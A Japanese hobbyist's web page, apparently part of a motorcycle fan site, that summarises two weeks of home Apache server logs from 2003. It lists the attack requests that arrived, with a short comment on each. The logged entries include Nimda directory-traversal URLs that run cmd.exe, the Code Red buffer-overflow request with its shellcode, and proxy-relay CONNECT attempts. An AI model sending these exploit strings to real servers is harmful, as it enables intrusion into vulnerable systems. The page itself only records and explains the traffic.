楽しみながら攻めつづける!
−HONDA '88NSR250R & '94NSR250R SE−

[検索方法]
 
山下の部屋 自宅サーバのログを見てみよう
お薦めコンテンツ 楽しみながら攻めつづける!
Apacheのログウォッチ 2003年4月1日〜2003年4月15日
 
 自宅Webサーバのログを集計してみました。噂通り?WinサーバーのIISセキュリティを突いた不正アクセスが多いようです(自宅サーバはLinux+Apacheなので大丈夫そうですが。汗)。robots.txtとfavicon.icoの2つのファイルは自宅サーバにファイルを置くことで解決出来るので、その内に・・・対応をしなくては。
  
400:Bad Request
Method URL Query 回数 理由
GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%%35c./winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XX%u9090%u6
858%ucbd3%u
7801%u9090%
u6858%ucbd3
%u7801%u909
0%u6858%ucb
d3%u7801%u9
090%u990%u8
190%u00c3%u
0003%u8b00%
u531b%u53ff%
u0078%u0000
%u00=a		   - 1 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
 
404:Not Found
Method URL Query 回数 理由
GET /default.ida XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XX%u9090%u6
858%ucbd3%u
7801%u9090%
u6858%ucbd3
%u7801%u909
0%u6858%ucb
d3%u7801%u9
090%u990%u8
190%u00c3%u
0003%u8b00%
u531b%u53ff%
u0078%u0000
%u00=a		 240 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /robots.txt   89 検索ロボット用の動きを制限するファイル
GET /_vti_bin/owssvr.dll UL=1&ACT=4
&BUILD=2614
&STRMVER=4
&CAPREQ=0		 30 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /MSOffice/cltreq.asp UL=1&ACT=4
&BUILD=2614
&STRMVER=4
&CAPREQ=0		 30 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /favicon.ico - 27 IEでお気に入りに追加した際に見に行くアイコンファイル
GET /scripts/root.exe /c+dir 14 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 13 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /c/winnt/system32/cmd.exe /c+dir 13 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /d/winnt/system32/cmd.exe /c+dir 13 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /MSADC/root.exe /c+dir 13 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 13 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%25%35%63../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%252f../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%2f../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 12 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /search sb=desc,cat&
desc=NSR&ca
t=26308&auc
cat=26308&a
cc=jp&apg=38
&f=0x12&o1=
a&alocale=0jp		 12
GET /scripts/..%255c%255c../winnt/system32/cmd.exe /c+dir 2 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /comein/Banner bid=B000375 1
 
405:Method Not Allowed
Method URL Query 回数 理由
CONNECT 207.46.181.13:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT 64.157.4.83:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT 131.107.3.125:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
 
501:Not Implemented
Method URL Query 回数 理由
\x04\x01 207.46.181.13:25 - 3 AN HTTPDのセキュリティホールをつく攻撃みたい
\x05\x01 64.157.4.83:25 - 2 AN HTTPDのセキュリティホールをつく攻撃みたい
 
 
BACK TOP PAGE